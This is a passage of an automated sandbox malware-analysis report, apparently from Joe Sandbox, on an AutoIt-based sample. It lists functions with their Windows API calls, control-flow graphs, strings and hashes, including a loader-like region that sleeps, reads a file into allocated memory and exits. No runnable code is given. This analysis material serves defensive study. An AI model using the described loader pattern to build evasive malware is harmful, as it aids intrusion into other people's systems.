                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1500180987-0
                            • Opcode ID: 41cff17dd03383fff9dde327fa6dbcb87015edc3579715b859da653640c40dd3
                            • Instruction ID: 7b0de6ce07ec8ee728fec088129bc4b1ca8927b7ba77ce2c240aff6d74f717ce
                            • Opcode Fuzzy Hash: 41cff17dd03383fff9dde327fa6dbcb87015edc3579715b859da653640c40dd3
                            • Instruction Fuzzy Hash: 76C13CB1E00229AADF11DF95DC85EDEBBBCEF45310F4040AAF609E6151DB349E848F65
                            Function 003C3766 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 267COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$xH$RH
                            • API String ID: 1825951767-626061487
                            • Opcode ID: f2c97edd4f69d982fdf211cd905d312c05cc462d7e0dc3c5ce31495e1b0a7ef1
                            • Instruction ID: 5181ff3807261619fd468ba1b9192fcabdca21811b707c64ecfee96f3037edbe
                            • Opcode Fuzzy Hash: f2c97edd4f69d982fdf211cd905d312c05cc462d7e0dc3c5ce31495e1b0a7ef1
                            • Instruction Fuzzy Hash: 91A1287291022DAADB16EBA0DC95FEEB779BF14310F40452EE416BB191DF745E08CBA0
                            Function 003C708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004852F8,?,003C37AE,?), ref: 003C4724
                              • Part of subcall function 003E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003C7165), ref: 003E052D
                            • RegOpenKeyExW.KERNEL32 ref: 003C71A8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003FE8C8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 003FE909
                            • RegCloseKey.ADVAPI32(?), ref: 003FE947
                            • _wcscat.LIBCMT ref: 003FE9A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                            • API String ID: 2673923337-2727554177
                            • Opcode ID: 09df74895940e4f05c147afeafa251cbd17ff975300c8f3e0513d04ec5fcb15a
                            • Instruction ID: ea53b65d2dae6547516e203738e9d26b97b2a9482dbfecde58a0e4cba8ffecf0
                            • Opcode Fuzzy Hash: 09df74895940e4f05c147afeafa251cbd17ff975300c8f3e0513d04ec5fcb15a
                            • Instruction Fuzzy Hash: 4E7169715083019AC346EF25EC41EAFBBA8FF85350B4149BEF545CA1B0EB719948CB56
                            Function 003C3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 876 3c3633-3c3681 878 3c36e1-3c36e3 876->878 879 3c3683-3c3686 876->879 878->879 880 3c36e5 878->880 881 3c3688-3c368f 879->881 882 3c36e7 879->882 883 3c36ca-3c36d2 DefWindowProcW 880->883 886 3c374b-3c3753 PostQuitMessage 881->886 887 3c3695-3c369a 881->887 884 3c36ed-3c36f0 882->884 885 3fd0cc-3fd0fa call 3d1070 call 3d1093 882->885 894 3c36d8-3c36de 883->894 888 3c3715-3c373c SetTimer RegisterWindowMessageW 884->888 889 3c36f2-3c36f3 884->889 923 3fd0ff-3fd106 885->923 893 3c3711-3c3713 886->893 891 3fd154-3fd168 call 422527 887->891 892 3c36a0-3c36a2 887->892 888->893 898 3c373e-3c3749 CreatePopupMenu 888->898 895 3fd06f-3fd072 889->895 896 3c36f9-3c370c KillTimer call 3c443a call 3c3114 889->896 891->893 917 3fd16e 891->917 899 3c36a8-3c36ad 892->899 900 3c3755-3c3764 call 3c44a0 892->900 893->894 902 3fd0a8-3fd0c7 MoveWindow 895->902 903 3fd074-3fd076 895->903 896->893 898->893 906 3fd139-3fd140 899->906 907 3c36b3-3c36b8 899->907 900->893 902->893 910 3fd078-3fd07b 903->910 911 3fd097-3fd0a3 SetFocus 903->911 906->883 913 3fd146-3fd14f call 417c36 906->913 915 3c36be-3c36c4 907->915 916 3fd124-3fd134 call 422d36 907->916 910->915 919 3fd081-3fd092 call 3d1070 910->919 911->893 913->883 915->883 915->923 916->893 917->883 919->893 923->883 927 3fd10c-3fd11f call 3c443a call 3c434a 923->927 927->883
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 003C36D2
                            • KillTimer.USER32 ref: 003C36FC
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C371F
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C372A
                            • CreatePopupMenu.USER32 ref: 003C373E
                            • PostQuitMessage.USER32(00000000), ref: 003C374D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated$%E
                            • API String ID: 129472671-1317701673
                            • Opcode ID: 6bd2e6c462df2139af752bf1fe47f7bd12a8c24dd63067f40604a630df861c94
                            • Instruction ID: ec05d5ffdf50b10010e0d7a1f27076ad4e75836136d289d2474f4322c5406e68
                            • Opcode Fuzzy Hash: 6bd2e6c462df2139af752bf1fe47f7bd12a8c24dd63067f40604a630df861c94
                            • Instruction Fuzzy Hash: BB4136B2200509BBDB277F64EC49F7D3759EB01300F10853EFA02D62A1DF699E6497A9
                            Function 003C3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32 ref: 003C3A50
                            • LoadCursorW.USER32 ref: 003C3A5F
                            • LoadIconW.USER32 ref: 003C3A76
                            • LoadIconW.USER32 ref: 003C3A88
                            • LoadIconW.USER32 ref: 003C3A9A
                            • LoadImageW.USER32 ref: 003C3AC0
                            • RegisterClassExW.USER32(?), ref: 003C3B16
                              • Part of subcall function 003C3041: GetSysColorBrush.USER32 ref: 003C3074
                              • Part of subcall function 003C3041: RegisterClassExW.USER32(00000030), ref: 003C309E
                              • Part of subcall function 003C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                              • Part of subcall function 003C3041: InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                              • Part of subcall function 003C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                              • Part of subcall function 003C3041: LoadIconW.USER32 ref: 003C30F2
                              • Part of subcall function 003C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 4a45b06f3ffe637bfaf4fdc22f3fb5cc5b031ef565da02b4feea85f5a9ba26a7
                            • Instruction ID: 7439f56f411e5d5dddb83315a23cbc655956bff26bd8fdeb6b9e2d5a04c25228
                            • Opcode Fuzzy Hash: 4a45b06f3ffe637bfaf4fdc22f3fb5cc5b031ef565da02b4feea85f5a9ba26a7
                            • Instruction Fuzzy Hash: 8B214B79D00308AFEB11DFA4EC49B9D7BB4FB08711F00457EE500AA2A1DBB55A548F88
                            Function 00E93C78 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 940 e93c78-e93d26 call e91698 943 e93d2d-e93d53 call e94b88 CreateFileW 940->943 946 e93d5a-e93d6a 943->946 947 e93d55 943->947 954 e93d6c 946->954 955 e93d71-e93d8b VirtualAlloc 946->955 948 e93ea5-e93ea9 947->948 949 e93eeb-e93eee 948->949 950 e93eab-e93eaf 948->950 956 e93ef1-e93ef8 949->956 952 e93ebb-e93ebf 950->952 953 e93eb1-e93eb4 950->953 957 e93ecf-e93ed3 952->957 958 e93ec1-e93ecb 952->958 953->952 954->948 959 e93d8d 955->959 960 e93d92-e93da9 ReadFile 955->960 961 e93efa-e93f05 956->961 962 e93f4d-e93f62 956->962 965 e93ee3 957->965 966 e93ed5-e93edf 957->966 958->957 959->948 967 e93dab 960->967 968 e93db0-e93df0 VirtualAlloc 960->968 969 e93f09-e93f15 961->969 970 e93f07 961->970 963 e93f72-e93f7a 962->963 964 e93f64-e93f6f VirtualFree 962->964 964->963 965->949 966->965 967->948 973 e93df2 968->973 974 e93df7-e93e12 call e94dd8 968->974 971 e93f29-e93f35 969->971 972 e93f17-e93f27 969->972 970->962 976 e93f42-e93f48 971->976 977 e93f37-e93f40 971->977 975 e93f4b 972->975 973->948 980 e93e1d-e93e27 974->980 975->956 976->975 977->975 981 e93e29-e93e58 call e94dd8 980->981 982 e93e5a-e93e6e call e94be8 980->982 981->980 988 e93e70 982->988 989 e93e72-e93e76 982->989 988->948 990 e93e78-e93e7c CloseHandle 989->990 991 e93e82-e93e86 989->991 990->991 992 e93e88-e93e93 VirtualFree 991->992 993 e93e96-e93e9f 991->993 992->993 993->943 993->948
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E93D49
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E93F6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID: cE
                            • API String ID: 204039940-3226056788
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: dc5770f24693d189e4e5511b0f0361ad2e60256b372218558656bdc1e206ebf9
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: 1DA10574E00209EBDF14CFA4C898BEEBBB5BF48304F209199E511BB281D7759A81CB54
                            Function 003CF76F Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 168comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003E0193
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 003E019B
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003E01A6
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003E01B1
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003E01B9
                              • Part of subcall function 003E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003E01C1
                              • Part of subcall function 003D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003CF930), ref: 003D6154
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003CF9CD
                            • OleInitialize.OLE32(00000000), ref: 003CFA4A
                            • CloseHandle.KERNEL32(00000000), ref: 004045C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                            • String ID: PQ$\TH$xT$%E$SH
                            • API String ID: 1986988660-2209345704
                            • Opcode ID: 0ecebce9db2a36e373cf92512b89ca569061884af6a998eaabbb84f4ec57ee01
                            • Instruction ID: 43e2980a1554f2bca34a8095710d10fafc4cd46acc4db1a65912afecf724bee3
                            • Opcode Fuzzy Hash: 0ecebce9db2a36e373cf92512b89ca569061884af6a998eaabbb84f4ec57ee01
                            • Instruction Fuzzy Hash: C5819BB4901A40CFC385EF79A945B1D7BE5FB98B06790893EA819CB372E77444848F1D
                            Function 003C407C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1102 3c407c-3c4092 1103 3c416f-3c4173 1102->1103 1104 3c4098-3c40ad call 3c7a16 1102->1104 1107 3fd3c8-3fd3d7 LoadStringW 1104->1107 1108 3c40b3-3c40d3 call 3c7bcc 1104->1108 1111 3fd3e2-3fd3fa call 3c7b2e call 3c6fe3 1107->1111 1108->1111 1112 3c40d9-3c40dd 1108->1112 1121 3c40ed-3c416a call 3e2de0 call 3c454e call 3e2dbc Shell_NotifyIconW call 3c5904 1111->1121 1124 3fd400-3fd41e call 3c7cab call 3c6fe3 call 3c7cab 1111->1124 1114 3c4174-3c417d call 3c8047 1112->1114 1115 3c40e3-3c40e8 call 3c7b2e 1112->1115 1114->1121 1115->1121 1121->1103 1124->1121
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003FD3D7
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _memset.LIBCMT ref: 003C40FC
                            • _wcscpy.LIBCMT ref: 003C4150
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C4160
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line: $xH
                            • API String ID: 3942752672-1455260238
                            • Opcode ID: a4bb121fc5ba4c6f27865153e7a0a28f1335bdde375a0de8adbc8527baf21eb7
                            • Instruction ID: 7a4098d9bf7d1363b4a75bf0db381c95996506c679f129598b5217f647115db8
                            • Opcode Fuzzy Hash: a4bb121fc5ba4c6f27865153e7a0a28f1335bdde375a0de8adbc8527baf21eb7
                            • Instruction Fuzzy Hash: 07318D71008705AAD322EB60DC46FDF77DCAB54314F10492EFA85D61A1DF74AA48CB96
                            Function 003C39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1147 3c39d5-3c3a45 CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 09ad139d95151ebb1fe1e6ed86dc52344b642c5502edd2c7ed5aed1e9a9314fd
                            • Instruction ID: 5357284d8083b794ecfc478d7ec8ff6f6aa622e3ca66dcf46ce20e6e0835f0a4
                            • Opcode Fuzzy Hash: 09ad139d95151ebb1fe1e6ed86dc52344b642c5502edd2c7ed5aed1e9a9314fd
                            • Instruction Fuzzy Hash: CBF03A705402907EEA3157236C08E2B3E7DD7C7F50B00447EB900E2170CA650840CFB8
                            Function 00E93A48 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1148 e93a48-e93b70 call e91698 call e93938 CreateFileW 1155 e93b72 1148->1155 1156 e93b77-e93b87 1148->1156 1157 e93c27-e93c2c 1155->1157 1159 e93b89 1156->1159 1160 e93b8e-e93ba8 VirtualAlloc 1156->1160 1159->1157 1161 e93baa 1160->1161 1162 e93bac-e93bc3 ReadFile 1160->1162 1161->1157 1163 e93bc5 1162->1163 1164 e93bc7-e93c01 call e93978 call e92938 1162->1164 1163->1157 1169 e93c1d-e93c25 ExitProcess 1164->1169 1170 e93c03-e93c18 call e939c8 1164->1170 1169->1157 1170->1169
                            APIs
                              • Part of subcall function 00E93938: Sleep.KERNELBASE(000001F4), ref: 00E93949
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E93B66
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: K07L25CJ2DRME
                            • API String ID: 2694422964-835341977
                            • Opcode ID: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction ID: e03330219c6c092bc285b752190b92e6b4a06137755e4b5fbe7c66aebdd231d2
                            • Opcode Fuzzy Hash: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction Fuzzy Hash: D451AE70D04248EBEF11DBB4C855BEEBBB9AF58300F004599E609BB2C1D7B94B05CBA5
                            Function 003E541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1172 3e541d-3e5436 1173 3e5438-3e543d 1172->1173 1174 3e5453 1172->1174 1173->1174 1176 3e543f-3e5441 1173->1176 1175 3e5455-3e545b 1174->1175 1177 3e545c-3e5461 1176->1177 1178 3e5443-3e5448 call 3e8b28 1176->1178 1179 3e546f-3e5473 1177->1179 1180 3e5463-3e546d 1177->1180 1186 3e544e call 3e8db6 1178->1186 1184 3e5475-3e5480 call 3e2de0 1179->1184 1185 3e5483-3e5485 1179->1185 1180->1179 1183 3e5493-3e54a2 1180->1183 1189 3e54a9 1183->1189 1190 3e54a4-3e54a7 1183->1190 1184->1185 1185->1178 1188 3e5487-3e5491 1185->1188 1186->1174 1188->1178 1188->1183 1191 3e54ae-3e54b3 1189->1191 1190->1191 1194 3e559c-3e559f 1191->1194 1195 3e54b9-3e54c0 1191->1195 1194->1175 1196 3e54c2-3e54ca 1195->1196 1197 3e5501-3e5503 1195->1197 1196->1197 1198 3e54cc 1196->1198 1199 3e556d-3e556e call 3f0ba7 1197->1199 1200 3e5505-3e5507 1197->1200 1201 3e55ca 1198->1201 1202 3e54d2-3e54d4 1198->1202 1211 3e5573-3e5577 1199->1211 1204 3e552b-3e5536 1200->1204 1205 3e5509-3e5511 1200->1205 1210 3e55ce-3e55d7 1201->1210 1208 3e54db-3e54e0 1202->1208 1209 3e54d6-3e54d8 1202->1209 1206 3e553a-3e553d 1204->1206 1207 3e5538 1204->1207 1212 3e5513-3e551f 1205->1212 1213 3e5521-3e5525 1205->1213 1214 3e553f-3e554b call 3e46e6 call 3f0e5b 1206->1214 1215 3e55a4-3e55a8 1206->1215 1207->1206 1208->1215 1216 3e54e6-3e54ff call 3f0cc8 1208->1216 1209->1208 1210->1175 1211->1210 1217 3e5579-3e557e 1211->1217 1218 3e5527-3e5529 1212->1218 1213->1218 1233 3e5550-3e5555 1214->1233 1219 3e55ba-3e55c5 call 3e8b28 1215->1219 1220 3e55aa-3e55b7 call 3e2de0 1215->1220 1232 3e5562-3e556b 1216->1232 1217->1215 1223 3e5580-3e5591 1217->1223 1218->1206 1219->1186 1220->1219 1224 3e5594-3e5596 1223->1224 1224->1194 1224->1195 1232->1224 1234 3e55dc-3e55e0 1233->1234 1235 3e555b-3e555e 1233->1235 1234->1210 1235->1201 1236 3e5560 1235->1236 1236->1232
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                            • Instruction ID: 1d7a97ab53c7b5497f1e2ae2a0f3605a046daa81008ee07a317cea8cf7fcb025
                            • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                            • Instruction Fuzzy Hash: 1D51D730A00BA5DBCB268FABDC4066E77B6AF41329F258729F836962D1D7709D508F40
                            Function 003C686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2036 3c686a-3c6891 call 3c4ddd 2039 3c6897-3c68a5 call 3c4ddd 2036->2039 2040 3fe031-3fe041 call 42955b 2036->2040 2039->2040 2045 3c68ab-3c68b1 2039->2045 2044 3fe046-3fe048 2040->2044 2046 3fe04a-3fe04d call 3c4e4a 2044->2046 2047 3fe067-3fe0af call 3e0db6 2044->2047 2049 3c68b7-3c68d9 call 3c6a8c 2045->2049 2050 3fe052-3fe061 call 4242f8 2045->2050 2046->2050 2055 3fe0d4 2047->2055 2056 3fe0b1-3fe0bb 2047->2056 2050->2047 2060 3fe0d6-3fe0e9 2055->2060 2059 3fe0cf-3fe0d0 2056->2059 2061 3fe0bd-3fe0cc 2059->2061 2062 3fe0d2 2059->2062 2063 3fe0ef 2060->2063 2064 3fe260-3fe271 call 3e2d55 call 3c4e4a 2060->2064 2061->2059 2062->2060 2066 3fe0f6-3fe0f9 call 3c7480 2063->2066 2073 3fe273-3fe283 call 3c7616 call 3c5d9b 2064->2073 2070 3fe0fe-3fe120 call 3c5db2 call 4273e9 2066->2070 2079 3fe134-3fe13e call 4273d3 2070->2079 2080 3fe122-3fe12f 2070->2080 2090 3fe288-3fe2b8 call 41f7a1 call 3e0e2c call 3e2d55 call 3c4e4a 2073->2090 2088 3fe158-3fe162 call 4273bd 2079->2088 2089 3fe140-3fe153 2079->2089 2082 3fe227-3fe237 call 3c750f 2080->2082 2082->2070 2092 3fe23d-3fe25a call 3c735d 2082->2092 2099 3fe176-3fe180 call 3c5e2a 2088->2099 2100 3fe164-3fe171 2088->2100 2089->2082 2090->2073 2092->2064 2092->2066 2099->2082 2106 3fe186-3fe19e call 41f73d 2099->2106 2100->2082 2111 3fe1c1-3fe1c4 2106->2111 2112 3fe1a0-3fe1bf call 3c7de1 call 3c5904 2106->2112 2114 3fe1c6-3fe1e1 call 3c7de1 call 3c6839 call 3c5904 2111->2114 2115 3fe1f2-3fe1f5 2111->2115 2135 3fe1e2-3fe1f0 call 3c5db2 2112->2135 2114->2135 2117 3fe1f7-3fe200 call 41f65e 2115->2117 2118 3fe215-3fe218 call 42737f 2115->2118 2117->2090 2128 3fe206-3fe210 call 3e0e2c 2117->2128 2125 3fe21d-3fe226 call 3e0e2c 2118->2125 2125->2082 2128->2070 2135->2125
                            APIs
                              • Part of subcall function 003C4DDD: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,004852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003C4E0F
                            • _free.LIBCMT ref: 003FE263
                            • _free.LIBCMT ref: 003FE2AA
